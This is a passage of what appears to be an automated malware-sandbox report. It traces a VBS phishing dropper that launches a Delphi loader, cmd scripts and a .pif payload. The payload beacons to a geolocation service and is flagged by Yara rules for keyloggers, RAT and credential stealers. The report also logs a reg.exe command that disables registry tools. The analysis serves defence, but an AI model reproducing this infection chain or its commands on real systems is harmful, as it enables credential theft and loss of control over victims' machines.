                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 79 44 58 42 4f 4b 2b 48 48 6e 4a 4a 51 43 51 53 55 71 48 63 42 6d 7a 56 46 57 32 57 47 35 30 64 35 67 54 64 37 72 72 70 6b 42 30 52 36 58 63 4b 48 52 70 63 2b 79 4a 6e 53 7a 2b 4f 57 65 54 70 39 38 6c 53 51 77 47 65 4a 7a 6f 41 6e 6e 74 49 65 4a 39 6a 78 34 65 39 31 67 35 54 30 67 4e 69 48 71 36 63 46 59 4b 43 33 65 41 74 67 75 56 33 74 6c 41 64 59 47 36 56 4d 34 54 36 4e 41 77 35 49 7a 38 44 63 68 73 6e 31 46 6a 59 35 58 58 49 72 4a 43 51 78 6a 56 54 57 51 69 71 6d 46 73 71 31 4d 65 50 4e 67 4a 65 55 56 73 42 6d 39 2f 64 62 61 74 59 36 54 4d 30 55 42 6b 66 59 4d 73 6d 69 68 2f 46 4a 65 68 66 34 39 34 64 4f 39 36 6f 35 30 58 70 55 76 4e 75 50 79 5a 6b 6a 34 47 57 63 79 37 66 78 49 6d 7a 43 61 56 68 62 4e 54 30 6d 4a 42 30 37 41 41 76 56 72 30 74 45 64 42
                                                                                      Data Ascii: yDXBOK+HHnJJQCQSUqHcBmzVFW2WG50d5gTd7rrpkB0R6XcKHRpc+yJnSz+OWeTp98lSQwGeJzoAnntIeJ9jx4e91g5T0gNiHq6cFYKC3eAtguV3tlAdYG6VM4T6NAw5Iz8Dchsn1FjY5XXIrJCQxjVTWQiqmFsq1MePNgJeUVsBm9/dbatY6TM0UBkfYMsmih/FJehf494dO96o50XpUvNuPyZkj4GWcy7fxImzCaVhbNT0mJB07AAvVr0tEdB
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 64 47 58 31 67 78 68 56 47 6c 53 47 54 46 54 58 65 52 6b 58 41 31 4d 44 4d 71 33 56 30 43 66 58 64 50 37 75 56 74 53 56 38 49 6a 53 6f 31 46 2b 66 71 49 4e 50 70 64 74 51 7a 42 4c 74 72 51 75 39 6f 6d 45 54 4b 69 6e 69 4b 73 49 50 69 42 39 62 73 57 57 77 5a 35 6d 35 44 46 48 54 31 34 61 69 70 50 38 50 72 70 56 6a 4c 42 50 7a 30 77 67 54 79 35 31 7a 51 6d 7a 38 55 59 38 4e 41 70 59 6c 63 4b 2b 33 52 7a 4b 65 6e 33 6e 48 6e 67 39 6c 4f 2b 6f 64 67 68 68 71 61 51 70 78 6a 43 73 41 55 51 7a 35 37 36 44 6d 39 50 6f 2b 51 63 62 4a 6f 74 37 75 6b 4c 44 56 54 49 4f 30 37 6d 69 6a 4a 43 5a 4a 6e 59 53 4b 45 73 5a 4d 41 44 72 71 4b 36 34 38 31 59 61 50 78 62 4a 5a 70 4c 37 50 6c 66 42 49 66 38 4e 67 51 6c 48 41 55 4a 63 67 44 59 36 4a 46 6e 66 65 57 45 30 2b 65 46
                                                                                      Data Ascii: dGX1gxhVGlSGTFTXeRkXA1MDMq3V0CfXdP7uVtSV8IjSo1F+fqINPpdtQzBLtrQu9omETKiniKsIPiB9bsWWwZ5m5DFHT14aipP8PrpVjLBPz0wgTy51zQmz8UY8NApYlcK+3RzKen3nHng9lO+odghhqaQpxjCsAUQz576Dm9Po+QcbJot7ukLDVTIO07mijJCZJnYSKEsZMADrqK6481YaPxbJZpL7PlfBIf8NgQlHAUJcgDY6JFnfeWE0+eF
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 54 78 5a 31 76 47 50 71 5a 34 50 33 41 64 4f 65 59 47 42 41 2f 55 51 61 79 50 50 4d 53 4c 59 68 51 50 5a 67 69 51 6f 50 71 2f 4e 67 6a 45 2f 53 42 73 2b 44 36 31 77 50 77 30 6c 7a 75 48 6b 6d 41 66 53 6c 61 55 47 38 48 43 70 74 41 78 32 73 68 63 58 51 63 7a 49 4e 35 4f 33 73 30 32 47 66 63 41 42 79 75 62 4b 62 4a 32 39 37 52 5a 45 72 65 73 72 44 66 56 30 72 67 67 74 76 57 64 35 61 50 7a 54 55 38 56 6e 36 49 49 45 74 57 4e 71 35 56 49 2b 42 6a 55 58 36 4f 7a 78 4a 34 65 38 51 7a 6a 4d 67 65 49 7a 2f 35 53 6d 43 55 6a 44 45 51 64 45 66 6c 4b 61 34 34 52 6c 64 53 6b 66 56 46 59 5a 42 73 6d 4b 55 75 53 30 75 6d 33 65 31 74 55 52 54 53 73 70 76 67 50 75 45 52 4f 35 74 2b 47 6a 4a 6a 72 39 4e 5a 70 51 51 6f 76 65 4c 7a 78 30 4c 63 61 42 74 63 50 69 49 31 41 47
                                                                                      Data Ascii: TxZ1vGPqZ4P3AdOeYGBA/UQayPPMSLYhQPZgiQoPq/NgjE/SBs+D61wPw0lzuHkmAfSlaUG8HCptAx2shcXQczIN5O3s02GfcAByubKbJ297RZEresrDfV0rggtvWd5aPzTU8Vn6IIEtWNq5VI+BjUX6OzxJ4e8QzjMgeIz/5SmCUjDEQdEflKa44RldSkfVFYZBsmKUuS0um3e1tURTSspvgPuERO5t+GjJjr9NZpQQoveLzx0LcaBtcPiI1AG


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449733104.21.96.14431856C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-16 07:29:22 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-16 07:29:22 UTC857INHTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:22 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 2327351
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z44cW9kTmae2jEwknmslLv9osTQHdjBtOiNP%2FmJJ7x%2FgvPFvXlEgS5FoaWfD7U%2F5OzE3w0ze7%2FfFYpcp0CQ4mVuwcIrhvV2He8C3tDekPaOcppSgrMlnM35HtCd6t1cZtJKs6qYc"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 902c64e33b4bde9a-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1538&min_rtt=1476&rtt_var=598&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1978319&cwnd=194&unsent_bytes=0&cid=49dcf55e96156446&ts=221&x=0"
                                                                                      2025-01-16 07:29:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.449741104.21.96.14435640C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-16 07:29:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-16 07:29:35 UTC857INHTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:35 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 2327364
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfDAoD%2F9h7Wnq4J6VDPABPs11ur7RCwBLqhsXFpF%2FhZjhqVkElx9IG9SsGVTAd8z73uwGpvognwkSECGDVm1kc%2Fus1r4m8XtUtYcO0YVk%2FjilsseBTZf7ZtI8iY5sH3P7QrjVyB6"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 902c653638b8de9a-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1446&min_rtt=1441&rtt_var=550&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1970310&cwnd=194&unsent_bytes=0&cid=7da9d3196fdf8b4e&ts=583&x=0"
                                                                                      2025-01-16 07:29:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.449743104.21.96.14435956C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-16 07:29:42 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-16 07:29:42 UTC851INHTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:42 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 2327371
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztgLSG8A1FIjeYBWxfniPkIusD4vKZGMke2W41Ov3S7mhykl3glSCwImxlGC24yE5qxQFK1rfM9WIJKcqyl%2FrtzTPqSE380L24GLJnWrJMPfluCKxIct9pZ4ygULGoR30kCEHsbt"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 902c655fdefc72a4-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1944&rtt_var=736&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1502057&cwnd=212&unsent_bytes=0&cid=5e5a6110b7bae14e&ts=164&x=0"
                                                                                      2025-01-16 07:29:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:02:29:11
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs"
                                                                                      Imagebase:0x7ff7a6930000
                                                                                      File size:170'496 bytes
                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:02:29:12
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:854'016 bytes
                                                                                      MD5 hash:4692AEE744A1B1FAB794FF334A77A462
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:Borland Delphi
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000001.00000003.1799207040.000000007FCB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 42%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:02:29:15
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\UhzauuilF.cmd" "
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:02:29:15
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:02:29:17
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:02:29:18
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:02:29:18
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Imagebase:0x400000
                                                                                      File size:175'800 bytes
                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3109531523.000000001D5BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000001.1853843841.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Antivirus matches:
                                                                                      • Detection: 3%, ReversingLabs
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:02:29:22
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                                                      Imagebase:0x550000
                                                                                      File size:59'392 bytes
                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:02:29:22
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:02:29:28
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\Public\Libraries\Uhzauuil.PIF
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Libraries\Uhzauuil.PIF"
                                                                                      Imagebase:0x400000
                                                                                      File size:854'016 bytes
                                                                                      MD5 hash:4692AEE744A1B1FAB794FF334A77A462
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:Borland Delphi
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 42%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:02:29:29
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Imagebase:0x400000
                                                                                      File size:175'800 bytes
                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.3089643523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
